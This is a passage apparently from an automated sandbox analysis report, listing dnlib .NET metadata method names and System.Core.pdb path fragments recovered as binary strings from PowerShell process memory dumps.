                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.3263198460.00000000025AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C01000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ore.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.3372267954.0000000008D00000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb, source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
